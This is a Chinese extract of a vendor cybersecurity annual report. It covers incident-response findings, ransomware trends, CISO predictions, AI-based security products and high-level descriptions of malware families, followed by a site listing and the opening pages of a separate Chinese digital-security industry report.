BEC、浏览器劫持和帐户接管)更加猖獗,较上一年增加 20%以上。造成这种增长的原因是人们越来越依赖云基础设施,以及向组织出售凭据和访问权限的访问代理异军突起。第第 6 6 章章78CHECK POINT SOFTWARE|2024 2024 年安全报告年安全报告勒索软件商业电子邮件攻击DDoS数据窃取钓鱼APT其他0102030405046%8%7%7%3%攻击中常用的工具CPIRT 分析显示,AnyDesk 和 TeamViewer 等工具通常是良性的远程桌面应用程序,但越来越多地被威胁执行者用于命令和控制。事实上,在我们分析的本年度事件中,就有 39%的事件使用了 AnyDesk。这种策略的重点是攻击者隐匿行踪,利用各种工具躲避传统的恶意软件检测。这些原本用于合法用途的工具越来越多地被威胁执行者使用,导致网络上的常规活动和恶意活动愈发难以区分。相比之下,使用 Mimikatz 和 CobaltStrike 等已知恶意工具的入侵事件分别占到 26%和 16%的比例。对该事件的进一步调查显示,攻击者使用 AnyDesk 作为首选远程命令工具,让他们能够持续访问入侵后的系统。由于初始访问并未触发安全警报,威胁执行者得以在众目睽睽之下隐身。图 41:2023 年 CPIRT 案例分类(按不同攻击类型)。第第 6 6 章章79CHECK POINT SOFTWARE|2024 2024 年安全报告年安全报告勒索软件:主要威胁在 CPIRT 分析的 2023 年勒索软件威胁格局中,有几个勒索软件系列尤为突出。值得注意的是,“Royal”勒索软件已迅速发展成为强有力的威胁,出现在大量攻击事件中。大多数案例使用网络钓鱼作为初始访问向量,通常会部署恶意 PDF 或采用回调网络钓鱼策略来安装远程桌面访问入口。此外,Royal 攻击者还为 Cobalt Strike、NSudo 和 PsExec 等工具赋予新用途,将其用于第二阶段攻击。ALPHV(BlackCat)勒索软件展现了其多面手的特质,被用来攻击包括 Windows、Linux 和 VMware 在内的各种系统实例。由于 ALPHV 以勒索软件即服务(RaaS)模式运作,由不同关联组织进行部署,可以看到在其部署之前使用了多种入口向量和 TTP,因而每起事件都具有独特性,很难做出预测和防御。并非所有漏洞都会立即遭到利用。威胁执行者一开始通常会使用大规模扫描程序,利用互联网设备中新发现的漏洞实施初始入侵。即便受害者对系统进行了修补,威胁执行者利用漏洞部署的 webshell 和其他持久化机制也会保持完好无损。威胁执行者建立的这些据点随后会由初始访问代理(IAB)出售,并且可能在数月或数年后重新出现在后续攻击中。TIM OTISCheck Point Software Technologies 全球检测和响应主管第第 6 6 章章80CHECK POINT SOFTWARE|2024 2024 年安全报告年安全报告此类漏洞 特别是 ProxyShell 和 Citrix RCE(CVE-2023-3519)使威胁执行者可以在面向互联网的易受攻击设备上安装 webshell。这些漏洞所针对的设备(例如 Exchange 服务器和 NetScaler Gateway)通常都面向互联网,因而成为主要攻击目标。这类设备一旦被攻破,便会由威胁执行者用作休眠中的据点,即使对设备进行了修补也无济于事。在深入调查该事件并尝试找到初始感染向量时,我们发现 Citrix NetScaler 系统中的远程代码执行漏洞 CVE-2023-3519 是最初的入侵点。攻击者利用该漏洞在设备上部署了 webshell,此类脚本在系统打补丁后也仍然不会被检出。这种疏忽令威胁执行者得以继续访问网络。漏洞暴露三个月后,该 webshell 由其他打算部署勒索软件的威胁执行者激活。幸运的是,由于客户的警觉性和 CPIRT 的及时响应,勒索软件攻击在造成破坏之前就被成功挫败。这种情况为管理员带来错误的安全感,让他们认为打过补丁的设备牢不可破,而威胁执行者实际上可能早早便已建立据点。在本年度调查中,我们发现威胁的最长休眠期为 22 个月。在进行漏洞修补后执行的安全程序必须将安全扫描包括在内,以清除可能的后门、webshell 和其他持久化机制。各组织还必须继续监控任何可能表明网络基础设施内存在隐蔽威胁的异常情况。第第 6 6 章章81CHECK POINT SOFTWARE|2024 2024 年安全报告年安全报告70为首席信息安全官提供独到 洞察 预测第第 7 7 章章82CHECK POINT SOFTWARE|2024 2024 年安全报告年安全报告JOHATHAN(JONY)FISCHBEINCheck Point Software Technologies 欧洲、中东和非洲 全球首席信息安全官威胁形势纷繁复杂,网安技术也在持续进化,但组织受限于预算,可能需要对资源分配情况做出战略性规划。组织在思考本年度网络安全基础设施如何达到最佳成熟度时,不妨参考 Check Point 全球首席信息安全官(CISO)团队的真知灼见。勒索软件攻击会越来越多,也将继续影响各种规模的组织,动辄向受害者勒索数百万美元。最值得注意的是,这些威胁将变得越来越具有规避性。企业已采用大量安全工具,往往却依然左支右绌,通常情况下,这些工具也并不具备互操作性。许多安全专业人员盲目自信,误以为他们的组织不会遇到勒索软件攻击,因此并未采取适当的行动。组织真正需要的是更好的预防和检测工具。采取整体性方法应对勒索软件并制定缓解策略对于组织非常重要。实施被动防御式解决方案并不足以应对勒索软件。勒索软件将继续存在并且 具有高度规避性规避性第第 7 7 章章83CHECK POINT SOFTWARE|2024 2024 年安全报告年安全报告DERYCK MITCHELSONCheck Point Software Technologies 欧洲、中东和非洲 区域首席信息安全官毫无疑问,组织对于这类诉讼逐渐习以为常。许多大型企业都经历过数据泄露事件,并为此支付了巨额赔偿金。这一问题影响的不仅仅是大型组织,小型组织也同样会受到波及,可能需要拿出数百万美元来赔付给股东以及数据遭到外泄的个人。数据泄露引发的集体诉讼正在增多,确实是令人担忧的情况。从 2022 年到 2023 年,数据泄露集体诉讼增加了两倍。此外,最近的调查结果显示,有 62%的受访 首席信息安全官担心自己在外泄事件中会被追究个人责任。之所以出现这种担忧,是因为存在 Uber 首席信息安全官被定罪的前车之鉴。随着组织遭遇的网络攻击网络攻击和数据泄露持续激增,所引发的集体诉讼的数量也在不断飙升,首席信首席信息安全官息安全官可能因此受到负面影响第第 7 7 章章84CHECK POINT SOFTWARE|2024 2024 年安全报告年安全报告PETE NICOLETTICheck Point Software Technologies 美洲地区首席信息安全官Check Point Research 最近刚刚指出,犯罪分子正在使用未经注册和不受保护的人工智能工具和引擎来达成不可告人的目的。这些工具不受法律法规约束。网络安全专业人员可能会发现在人工智能对抗中使用了所谓的“幽灵枪支”或“非序列化武器”。Check Point 的 ThreatCloud 和其他功能强大的产品可以帮助缓解这一问题,但要解决这一问题,未来还需付出更多努力。网络犯罪分子将利用基于人工智能的工具来窃取财务资源资源第第 7 7 章章85CHECK POINT SOFTWARE|2024 2024 年安全报告年安全报告80人工智能:当今网络安全战中的 前沿防御者第第 8 8 章章86CHECK POINT SOFTWARE|2024 2024 年安全报告年安全报告在不断发展的网络安全领域,人工智能(AI)打破既有规则,彻底改变了我们防范、抵御和应对网络威胁的方式。人工智能搅弄风云,对这一领域产生深远影响,为识别、分析和化解网络风险带来前所未有的优势。通过利用复合算法和机器学习,人工智能系统能够迅速检测出带有恶意的活动模式,以远快于传统方法的速度识别威胁。在网络攻击日趋复杂和频繁的时代,这种能力尤为重要。人工智能可以适应新威胁并从中学习,意味着它会不断改进防御策略,正因如此,在打击网络犯罪的持久战当中,人工智能已成为组织不可或缺的得力助手。将人工智能融入网络安全不仅能够提高安全措施的效率和成效,还能大幅减少应对这些数字危险所需的时间和资源,从而更精确、更智能地保护我们的数字世界。Infinity AI Copilot 借助智能 GenAI 的自动化和支持功能推动网络安全转型:更加安全、省时省力利用人工智能和云技术的这种融合,Infinity AI Copilot 得以提高安全团队的效率和成效,进而解决全球网络安全从业人员日益短缺的问题。通过利用自动化和协作情报的生成式人工智能安全解决方案,执行常见管理任务所需的时间最多可减少 90%。与其他各自为战的人工智能模型不同,Infinity AI Copilot 提供针对各种用例的广泛平台支持,帮助管理整个 Infinity 平台的安全。Infinity AI Copilot 了解客户的策略、访问规则、对象、日志以及所有产品文档,因而能够提供情景化、成套化的解决方案。第第 8 8 章章87CHECK POINT SOFTWARE|2024 2024 年安全报告年安全报告关键功能:加速安全管理:加速安全管理:Infinity AI Copilot 可节约多达 90%的安全任务管理工作时间,包括事件分析、实施和故障排除。由于更加省时,安全专业人员可将更多时间用于战略创新。管理和部署安全策略:管理和部署安全策略:管理、修改和自动部署对应于不同客户策略的访问规则和安全控制。改进事件缓解和响应:改进事件缓解和响应:在威胁搜寻、分析和解决过程中利用人工智能。监管所有解决方案和环境:监管所有解决方案和环境:AI Copilot 可监管整个 Check Point Infinity 平台上的所有产品(从网络到云再到工作空间),是真正全能的得力助手。简化自然语言处理:简化自然语言处理:与 Infinity AI Copilot GenAI 交互如同与人对话那样自然。它能理解以任何语言表述的意图,并通过聊天做出回应,让用户更轻松地进行交流以及执行任务。这种自然语言能力有助于实现无缝交互,令任务执行过程卓有成效。ThreatCloud AI 是 Check Point 的大数据智能引擎。该服务使用 50 多项人工智能和机器学习技术,可以识别及拦截前所未见的新威胁。在 50 款基于人工智能的引擎中,有 11 款采用深度学习技术,38 款采用经典机器学习技术。2023 2023 年,我们新增了年,我们新增了 12 12 款引擎:款引擎:ThreatCloud AI 每天聚合并分析大数据遥测数据以及数百万项入侵威胁指标(IoC)。其威胁情报数据库来自 15 万个连接的网络和数百万台终端设备,以及 Check Point Research 和数十个外部源。ThreatCloud AI 可在 Check Point 的整个安全堆栈中实时更新最新发现的威胁和相应的防护机制。2深度学习7经典机器学习3传统第第 8 8 章章88CHECK POINT SOFTWARE|2024 2024 年安全报告年安全报告大数据威胁情报大数据威胁情报2800000000个网站和文件接受检查146000000封完整 内容电子 邮件53000000次文件 仿真20000000台潜在物联网(IoT)设备2600000项恶意 指标1500000个新安装的移动终端应用程序1200000个在线 Web 表单每日 每日 统计!统计!协作式安全协作式安全 THREATCLOUD AI THREATCLOUD AI人工智能与您的数据息息相关人工智能与您的数据息息相关以下是 ThreatCloud AI 防范新型网络威胁的一些方法:ThreatCloud Graph:网络安全的多维视角这是一项创新功能,在针对独立实体(例如 URL、IP 和域名)的传统分析之上更进一步。ThreatCloud Graph 深入研究这些实体之间的互联关系网络,以多维视角解读网络威胁。ThreatCloud Graph 采用创新方法分析网络威胁环境中的互联关系网络,提供可以实现前瞻式威胁防护、执行深入攻击检测以及有效防御零日威胁的强大工具。第第 8 8 章章89CHECK POINT SOFTWARE|2024 2024 年安全报告年安全报告主要优势:整体性威胁防护整体性威胁防护 通过分析 URL、IP 和域名等各种实体之间的关系,ThreatCloud Graph 可提供网络威胁的全面视图。在对单独的威胁进行检查之余,这种方法还提供了注重主动预防的多维视角。这种整体视角可以让我们更深入地了解威胁如何互联,以及它们在更大的网络和活动中如何运作。图表模式和攻击洞察图表模式和攻击洞察 通过识别不同网络实体之间的独特关系模式,ThreatCloud Graph 可提供有关恶意活动的宝贵洞察。这一功能在检测和认识 DNS 投毒等复杂攻击时尤其有用。对这些模式和常见实体之间的联系加以识别,有助于及早检测和防范复杂网络威胁,从而增强整体安全性。防范新出现的零日威胁防范新出现的零日威胁 利用 ThreatCloud AI 的知识,ThreatCloud Graph 能够游刃有余地防范零日攻击等新威胁。它在建立 URL、域和 IP 地址的信誉时以它们与先前已知恶意工件的关系为基础。这种先导式方法并不完全依赖于检测到的恶意内容,因而能够及早识别和阻止潜在威胁,确保针对最成熟和新出现的攻击提供强有力的 保护。123第第 8 8 章章90CHECK POINT SOFTWARE|2024 2024 年安全报告年安全报告人工智能驱动的品牌欺诈防御 为了扩展零钓鱼解决方案,我们引入创新的人工智能引擎,用于防范网络钓鱼攻击中使用的本地和全球品牌仿冒行为,并跨网络、电子邮件、移动设备和终端进行协同保护,捕获率相比传统技术提升 40%。新开发的引擎可以拦截与本地和全球品牌相关的链接和浏览,这些品牌在涉及多种语言和多个国家/地区的网络钓鱼攻击中遭到仿冒,并且被用作吸引受害者上钩的诱饵。人工智能驱动的品牌欺诈防御人工智能驱动的品牌欺诈防御前瞻式实时防御前瞻式实时防御ThreatCloud AI ThreatCloud AI 协作式防护协作式防护保护您的组织免受 品牌仿冒网络钓鱼攻击实时拦截 对国际或本地品牌 仿冒链接的访问捕获率相比传统技术 高出 40%利用创新的人工智能技术,系统可在新域名注册时 进行自动检查,以识别潜在的品牌欺诈攻击并予以拦截,阻止这些新域名用于攻击跨网络、终端、移动端和 SaaS 环境针对任何攻击向量(包括电子邮件、文件、短信等)立即应用零品牌欺诈 保护功能。第第 8 8 章章91CHECK POINT SOFTWARE|2024 2024 年安全报告年安全报告Deep PDF 人工智能驱动引擎,可精准无误地识别恶意 PDF,无需依赖静态签名“Deep PDF”是具有创新意义的人工智能模型,也是 ThreatCloud AI 的组成部分,它在识别和拦截大规模全球性网络钓鱼活动中所用的恶意 PDF 方面取得了巨大的飞跃。这些攻击可通过各种向量实现,包括电子邮件、Web 下载、HTML 走私、SMS 消息等。Check Point Quantum 和 Harmony 系列产品可以保护这些向量,让我们的客户处于安全的网络环境中。“Deep PDFDeep PDF”的工作原理是什么?”的工作原理是什么?“Deep PDF”引擎通过检查 PDF 结构、嵌入式图像、URL 和原始内容,寻找网络钓鱼布局。该模型的过人之处不仅体现在能够检测的文件数量之庞大,还体现在检测的精确性,这使得它成为打击网络钓鱼活动和垃圾邮件的持久战中的宝贵资产。Check Point 研究人员发现 PDF 文件具有相似的结构。“Deep PDF”搜索多项内容,其中包括:恶意链接。文档中 URL 的放置位置。页面中图像的放置位置。我们将这些抽象特点及更多其他方面编码为特征,并训练“Deep PDF”区分良性和恶意 PDF 文件。第第 8 8 章章92CHECK POINT SOFTWARE|2024 2024 年安全报告年安全报告LinkGuard:用于检测恶意 LNK 文件的新型机器学习引擎 LinkGuard 机器学习引擎可用于检测恶意 LNK 文件,现已集成到 ThreatCloud AI 人们普遍认为 LNK 文件是无害的快捷方式,但网络犯罪分子常常利用这类文件来传播恶意软件和实施社会工程学攻击。这个新引擎能够有效识别混淆技术,利用语言分析实现高达 90%以上的检测率LinkGuard 可用于应对互联网上最狡猾的威胁之一:恶意 LNK 文件。这些欺骗性文件通常伪装成无害的快捷方式,会对您的系统造成严重破坏。LinkGuard 的使命就是:通过识别恶意代码执行和分析命令行参数来检测这些恶意 LNK 文件。LinkGuard LinkGuard 的本质的本质LinkGuard 是又一个由人工智能驱动的引擎,可以深入 LNK 文件,对其进行核心剖析。该引擎采用巧妙的方法,如检查文件的本质,以确定这些文件是否存在恶意行为。通过仔细检查 LNK 文件中隐藏的命令行参数,LinkGuard 可以查明任何恶意痕迹。它就像一个数字侦探,不知疲倦地搜寻威胁,让您对强化系统安全充满信心。LinkGuard LinkGuard 的工作原理的工作原理LinkGuard 使用三个基本原则:揭穿混淆:揭穿混淆:LinkGuard 擅长揭穿在 LNK 文件中用来隐藏恶意代码的混淆技术,即使是最狡猾的躲避技术,它也能成功揭穿。语言分析:语言分析:LinkGuard 利用自然语言处理(NLP)解密嵌入 LNK 文件的恶意主题,能够识别难以察觉的含有恶意的语言模式。辨别熟悉的策略:辨别熟悉的策略:LinkGuard 将有效识别网络威胁中与知名恶意代码执行的相似处,快速辨别网络攻击者使用的策略。通过结合以上三种强大的功能,LinkGuard 构建起固若金汤的安全屏障,可以有力抵御基于 LNK 的网络威胁。它不仅能够为您加强网络安全防御,还能够帮助打造更安全的数字环境。123第第 8 8 章章93CHECK POINT SOFTWARE|2024 2024 年安全报告年安全报告90恶意软件 系列说明第第 9 9 章章94CHECK POINT SOFTWARE|2024 2024 年安全报告年安全报告AgentTesla AgentTesla 是一种高级远程访问木马病毒(RAT),用作键盘记录程序和信息窃取程序,能够监视并收集受害者的按键输入内容,执行屏幕截图,并窃取安装在受害者机器上的各类软件的凭据,包括 Google Chrome、Mozilla Firefox 和 Microsoft Outlook 电子邮件客户端。Akira Akira 勒索软件于 2023 年首次报告,攻击目标为 Windows 和 Linux 系统。它使用 CryptGenRandom 和 Chacha 2008 的对称加密算法来进行文件加密,与之前泄露的 Conti v2 勒索软件类似。Akira 通过多种途径传播,包括受感染的电子邮件附件和 VPN 终端中的漏洞。它会在感染后加密数据,并在文件名后附加“.akira”扩展名,然后出示勒索凭证,要求支付解密费用。ALPHV BlackCat(又名 ALPHV)以勒索软件即服务(RaaS)的业务模式运作。BlackCat 勒索软件具有高度可定制性,能够对各种企业环境发动攻击。它将 Linux 和 Windows 系统作为攻击对象,使用 Rust 进行编程。AZORult AZORult 是一种能够从受感染的系统中收集和窃取数据的木马病毒。系统安装了恶意软件之后,AZORult 就可以将保存的密码、本地文件、加密货币钱包数据和计算机配置文件信息发送到远程 C&C 服务器。BiBi Wiper BiBi Wiper 是一种针对 Windows 和 Linux 系统的数据擦除恶意软件。它最初在针对以色列目标的攻击中被发现,以破坏力而闻名,目的是用垃圾数据覆盖目标目录中的数据,并向文件名附加“.BiBi”扩展名。CACTUS CACTUS 勒索软件是一种破坏性恶意软件,它会加密受害者计算机上的文件,并向每个加密文件添加唯一的“.CTS1”扩展名。该勒索软件以利用网络系统(尤其是 VPN 设备)中的漏洞来获取访问权限并在目标网络中传播而闻名。它采用 OpenSSL,通过 AES 和 RSA 进行加密。第第 9 9 章章95CHECK POINT SOFTWARE|2024 2024 年安全报告年安全报告CL0P CL0P 是最早于 2019 年初发现的一种勒索软件,主要针对大型企业。Cl0P 由俄语网络犯罪团伙操纵,采取“窃取、加密和泄露”策略。它近期的恶名源于利用 Accellion FTA 和 MOVEit Transfer 等面向公众的基础设施中的漏洞,由此窃取受害组织的敏感数据并进行加密。Cl0P 参与了大量“大猎杀”式勒索软件攻击,这类攻击针对多个行业,但并无特定的区域重点,而且避开了独联体(CIS)内部组织。CloudEyE CloudEye 是针对 Windows 平台的下载程序,用于将恶意程序下载至受害者计算机并进行安装。DarkGate DarkGate 自 2017 年 12 月年活跃至今,是一种复杂的恶意软件即服务(MaaS),以拥有广泛的功能而闻名,包括凭据窃取、键盘记录、屏幕捕获和远程访问等。DarkGate 是网络犯罪圈(主要是地下论坛)中的突出威胁之一。该恶意软件已进行过改装,能够绕过安全防御,用于多种攻击策略,包括发送网络钓鱼电子邮件以及利用 Microsoft Teams 等通信平台。DoppelPaymer DoppelPaymer 首次发现于 2019 年,是一种复杂的勒索软件变种,由早期 BitPaymer 演变而来。它针对的领域十分广泛,没有特定的行业偏好,使用 Dridex 木马程序通过鱼叉式网络钓鱼电子邮件进行初步渗透。DoppelPaymer 以其双重勒索策略而闻名,参与了数起针对全球大型组织的重大攻击事件。Emotet Emotet 是一种高级模块化多用途恶意软件。曾被用作银行木马程序,现在则用于分发其他恶意软件或恶意活动。它可以使用多种方法来维持持久性,并能采用躲避技术避开检测。另外,Emotet 也可通过包含恶意附件或链接的钓鱼垃圾电子邮件进行传播。FakeUpdates Fakeupdates(又名 SocGholish)是以 JavaScript 编写的下载程序。它在启动有效负载之前将其写入磁盘。Fakeupdates 会通过多种其他恶意软件(包括 GootLoader、Dridex、NetSupport、DoppelPaymer 和 AZORult)进一步入侵系统。第第 9 9 章章96CHECK POINT SOFTWARE|2024 2024 年安全报告年安全报告FormBook FormBook 是一种针对 Windows 操作系统的信息窃取程序,首次发现于 2016 年。它以强大的躲避技术与相对较低的价格为卖点,在地下黑客论坛上作为恶意软件即服务(MaaS)出售。FormBook 可通过各种 Web 浏览器窃取凭据、收集屏幕截图、进行监视并记录按键输入内容,还可根据其 C&C 的指令下载并执行文件。Glupteba Glupteba 是一种 Windows 后门程序,自 2011 年以来广为人知,其后逐渐发展成为僵尸网络。到 2019 年,它新增了通过公共比特币列表进行 C&C 地址更新的机制、完备的浏览器窃取程序功能以及路由器开发程序。GootLoader GootLoader 是一种隐蔽的恶意软件,主要用作攻击基于 Windows 的系统的第一阶段下载程序。它最初充当 GootKit 银行木马程序的下载程序,现已发展成为多有效负载恶意软件平台,能够提供复杂的第二阶段有效负载,例如 Cobalt Strike 信标和 REvil 勒索软件。GootLoader 利用 SEO 投毒将受害者重定向至遭入侵的网站,进行偷渡式下载活动,对多个国家/地区的各个行业都造成了影响。它采用反射加载和 PowerShell 命令等高级技术来实现持续渗透和有效躲避。Horse Shell Horse Shell 是由中国大陆政府支持的黑客组织“Camaro Dragon”用来攻击欧洲外交组织的定制恶意软件。该恶意软件于 2023 年 1 月发现,可感染民用 TP-Link 路由器,使攻击者能够完全控制这些设备。Horse Shell 作为后门程序运行,执行 shell 命令、传输文件并将路由器用作 SOCKS 代理进行通信。Impala Stealer Impala Stealer 是一种通过恶意 NuGet 软件包攻击.NET 开发人员的加密货币窃取恶意软件。它通过安装持久化后门程序来访问和窃取加密货币帐户的详细信息,利用误植域名伪装成合法的软件包。第第 9 9 章章97CHECK POINT SOFTWARE|2024 2024 年安全报告年安全报告JaguarTooth JaguarTooth 是一种 Cisco IOS 恶意软件,可锁定并修改路由器的身份验证机制,以允许未经身份验证的后门访问。它通过简单文件传输协议(TFTP)收集并窃取设备和网络信息,包括固件版本和网络配置。JaguarTooth 通过利用已知的简单网络管理协议(SNMP)漏洞 CVE-2017-6742 进行部署。KV-botnet KV-Botnet 和与中国大陆关联的威胁执行者 Volt Typhoon 有关,是一种主要针对小型办公室/家庭办公室(SOHO)路由器设备的复杂僵尸网络。它至少从 2022 年 2 月开始活跃,由名为 KV 和 JDY 的两个互补活动集群组成。LemonDuck LemonDuck 是一种加密货币挖掘僵尸网络,通过攻击受害者的计算机资源来挖掘 Monero 虚拟货币。它采用各种方法在网络上传播,例如使用电子邮件、psexec、WMI 和 SMB 漏洞发送受感染的 RTF 文件,这些漏洞包括影响 Windows 10 计算机的臭名昭著的 Eternal Blue 和 SMBGhost 威胁。LEMURLOOT LEMURLOOT 是一种与 CL0P 勒索软件组织相关的 Web shell 恶意软件,其目的是利用 MOVEit Transfer 托管文件传输(MFT)应用程序中的关键 SQL 注入漏洞(CVE-2023-34362)。LEMURLOOT 使用 C#语言编写,需要通过硬编码密码来进行身份验证。该恶意软件在 CL0P 组织的大量数据窃取和勒索攻击中发挥了重要作用。LockBit LockBit 是以 RaaS 模式运作的勒索软件,于 2019 年 9 月首次报告。LockBit 的目标并非俄罗斯或独联体的个人,而是其他国家/地区的大型企业和政府实体。LokiBot LokiBot 是一种针对 Windows 的商品信息窃取木马程序。它可以从各种不同的应用程序、Web 浏览器、电子邮件客户端以及 IT 管理工具(如 PuTTY)等收集凭据。LokiBot 曾在黑客论坛上售卖,据悉是因为其源代码遭泄露,才导致各类变种层出不穷。该信息窃取木马于 2016 年 2 月被首度披露。第第 9 9 章章98CHECK POINT SOFTWARE|2024 2024 年安全报告年安全报告Lucifer Lucifer 是一种混合恶意软件,以能够实施加密货币劫持及发动分布式拒绝服务(DDoS)攻击而闻名。Lucifer 利用多个高危和超危漏洞,最初的目标是 Windows 系统,但最近演变成为针对 Linux 和物联网设备的多平台和多架构恶意软件,并且有独立的 ARM 和 MIPS 版本。Medusa Medusa 勒索软件自 2021 年 6 月开始活跃,以勒索软件即服务(RaaS)模式运作,采用双重勒索策略(加密和泄露数据,威胁称若不支付赎金便外泄或出售数据。)Mirai Mirai 是一个声名狼藉的物联网(IoT)恶意软件,可以追踪易受攻击的 IoT 设备(例如网络摄像头、调制解调器和路由器),并将其变成僵尸设备。僵尸网络操纵者利用该恶意软件发起大规模分布式拒绝服务(DDoS)攻击。Mirai 僵尸网络首次发现于 2016 年 9 月,因其庞大的攻击规模迅速成为了当时的焦点话题。Mirai 发动的攻击包括造成利比里亚整个国家陷入停摆的一场大规模 DDoS 攻击,以及针对互联网基础设施公司 Dyn 的 DDoS 攻击,美国绝大多数的互联网基础设施均由 Dyn 提供。Nanocore NanoCore 是一种远程访问木马程序(RAT),攻击目标是 Windows 操作系统用户,2013 年首次被发现。RAT 的所有版本都包含基本的插件和功能,如屏幕截图、加密货币挖矿、远程控制桌面和网络摄像头会话窃取。NetSupport NetSupport 恶意软件被认定为远程访问木马程序(RAT),主要针对教育、政府和商业服务等行业。NetSupport 最初是一种合法的远程管理工具,后来被威胁执行者改变用途,用于监视行为、文件传输和渗透网络等恶意活动。njRAT njRAT 又名 Bladabindi,是由 M38dHhM 黑客组织开发的 RAT。于 2012 年首次报告,主要用于攻击中东地区的目标。第第 9 9 章章99CHECK POINT SOFTWARE|2024 2024 年安全报告年安全报告Nokoyawa Nokoyawa 是基于 Windows 的勒索软件系列,于 2022 年 2 月首次发现,以双重勒索攻击而闻名。该勒索软件最初以 C 语言编写,后来使用 Rust 语言重写,与 Nemty 和 Karma 勒索软件系列在编码上存在相似之处。据悉该勒索软件会利用 CVE-2023-28252 等漏洞进行攻击。Phorpiex Phorpiex(又名 Trik)是自 2010 年活跃至今的僵尸网络,最猖獗时期一度操控逾百万台受感染主机。它通过垃圾邮件活动分发其他系列的恶意软件,助长大规模垃圾邮件活动和性勒索攻击活动的气焰,并以此声名鹊起。Qbot Qbot 又名 Qakbot 是一种银行木马病毒,首次发现于 2008 年。其设计初衷是为了窃取用户的银行凭据和按键输入内容。Qbot 经常通过垃圾邮件进行分发,它采用了多种反虚拟机、反调试和反沙盒技术来阻碍分析和躲避检测。Raccoon Raccoon 信息窃取程序首次发现于 2019 年 4 月。该信息窃取程序以 Windows 系统为目标,在地下论坛中作为 MaaS(恶意软件即服务)出售。这种简单的信息窃取程序能够收集浏览器 Cookie、历史记录、登录凭据、加密货币钱包和信用卡信息。Ramnit Ramnit 模块化银行木马病毒首次发现于 2010 年。Ramnit 可以窃取 Web 会话信息,让操纵者能够窃取受害者使用的所有服务的凭据,包括银行账户、企业帐户和社交网络帐户。该木马病毒使用硬编码域以及由 DGA(域生成算法)生成的域来联系 C&C 服务器并下载额外的模块。Raspberry Robin Raspberry Robin 是一款多用途恶意软件,最初通过受感染 USB 设备进行分发,具有蠕虫功能。RedRelay RedRelay 是一个共享代理网络,由包括中国大陆网络间谍攻击者 Red Vulture 在内的多个威胁执行者利用。RedRelay 采用多跳代理和加密通信等功能来增加分析和归因难度。该网络由威胁执行者操作的虚拟专用服务器(VPS)与遭入侵设备组合而成。第第 9 9 章章100CHECK POINT SOFTWARE|2024 2024 年安全报告年安全报告Remcos Remcos 是一种远程访问木马病毒(RAT),于 2016 年首次被发现。Remcos 通过附加在垃圾邮件中的恶意 Microsoft Office 文档进行自我分发。它被设计成绕过 Microsoft Windows UAC 安全机制,以高级权限执行恶意软件。RubyMiner RubyMiner 于 2018 年 1 月首次被发现,其目标是 Windows 和 Linux 服务器。RubyMiner 搜寻易受攻击的 Web 服务器(例如 PHP、Microsoft IIS 和 Ruby on Rails),通过开源 Monero 挖掘软件 XMRig,将这些服务器用于加密货币挖掘活动。StripedFly StripedFly 最初被错误地归类为加密货币挖掘程序,是一种复杂多变的蠕虫式恶意软件框架。它的恶劣影响遍及世界各地,至少从 2017 年便开始出现,感染的受害者有百万之众。Ursnif Ursnif 是针对 Windows 的 Gozi 银行木马程序的变种,其源代码曾在网上流出。它具有浏览器中间人攻击(Man-in-the-Browser)功能,可以窃取流行在线服务的银行信息和凭据。此外,它还可以从本地电子邮件客户端、浏览器和加密货币钱包中窃取信息。最后,该木马程序可以在受感染系统上下载和执行其他文件。WannaMine WannaMine 是一种利用永恒之蓝(EternalBlue)漏洞进行传播的复杂 Monero 加密货币挖矿蠕虫。WannaMine 利用 Windows 管理规范(Windows Management Instrumentation,WMI)永久事件订阅进行传播并维持持久化。XMRig XMRig 是一种用于 Monero 加密货币挖矿的开源 CPU 挖矿软件。威胁执行者经常滥用这种开源软件,将其集成到恶意软件中,在受害者的设备上进行非法挖矿。ZuoRAT ZuoRAT 是一种远程访问木马程序(RAT),主要针对小型办公室/家庭办公室(SOHO)路由器。它源于 Mirai 僵尸网络,至少从 2020 年已开始运作。ZuoRAT 采用广泛的网络侦察、数据收集和网络通信劫持手段。第第 9 9 章章101CHECK POINT SOFTWARE|2024 2024 年安全报告年安全报告01结语第第 10 10 章章102CHECK POINT SOFTWARE|2024 2024 年安全报告年安全报告在迈入新一年之际,我们应以上一年的模式和教训为基础,制定新的、有弹性的战略。积极主动地识别新趋势、认识漏洞并了解威胁执行者的手段,对于制定有效、可持续的网络安全计划至关重要。本安全报告旨在为网络安全领导者提供必要的认知和预见,帮助其始终领先网络对手一步。从勒索软件零日攻击的兴起到黑客行动主义带来的新风险,组织迫切需要适应并采用新的安全措施。在技术日新月异的时代,本文分享的见解可作为 2024 年及未来驾驭网络安全格局的路线图。第第 10 10 章章联系我们全球总部5 Shlomo Kaplan Street,Tel Aviv 6789159,Israel 电话:972-3-753-4599 电子邮件:中国总部上海市黄浦区延安东路 550 号海洋大厦 1806-1808 室|邮编:200020|正遭受攻击?请联系 Check Point 事件响应团队:emergency-CHECK POINT RESEARCH 官方微信 欢迎访问我们的网站 https:/ 1994-2024 Check Point Software Technologies Ltd.保留所有权利。

    浏览量91人已浏览 发布时间2024-05-08 103页 推荐指数推荐指数推荐指数推荐指数推荐指数5星级
  • 数世咨询:中国数字安全产业年度报告(2023)(90页).pdf

    北京数字世界咨询有限公司 2023.6中国数字安全产业年度报告(2023)北京数字世界咨询有限公司 2023.6中国数字安全产业年度报告(2023)数字世界以网络连接为基础,以数据流动释放价值,以人工智能塑造未来。数字安全以网络安全为基本手段,以数据安全为核心目的,支撑数字经济的健康发展和国家社会的和谐稳定。数字世界,安全共生!数世咨询作为国内独立的第三方调研咨询机构,为监管机构、地方政府、投资机构、企业用户等合作伙伴提供数字安全产业现状调研,细分技术领域调研、投融资对接、技术尽职调查、市场品牌活动等调研咨询服务。报告编委首席分析师李少鹏综合分析师刘宸宇战略分析师靳慧超市场分析师左 晶统计分析师牛爱民 数世智库数字安全能力研究院 版权声明本报告版权属于北京数字世界咨询有限公司(以下简称数世咨询)。任何转载、摘编或利用其他方式使用本报告文字或者观点,应注明来源。违反上述声明者,数世咨询将保留依法追究其相关责任的权利。目录前言 1第一章统计标准 2一、统计口径 3二、统计范围 3三、统计方法 4四、术语解释 4第二章数字安全 市场 6一、市场规模 二、业务分类 9三、客户分布 10四、城市分布 11第三章数字安全 企业 12一、收入水平 13二、上市企业 13三、数字安全百强 161、综合实力百强 162、年度成长力十强 183、年度创新力十强 194、专精特新百强 20四、从业人员 21第四章数字安全 技术23目录一、数字安全的内涵24二、数字安全能力图谱 261、政府部委 28案例:基于分类分级的数字政府数据安全流转监测与防护方案29案例:某人力资源和社会保障局电子社保移动安全建设案例312、金融 34案例:斗象科技 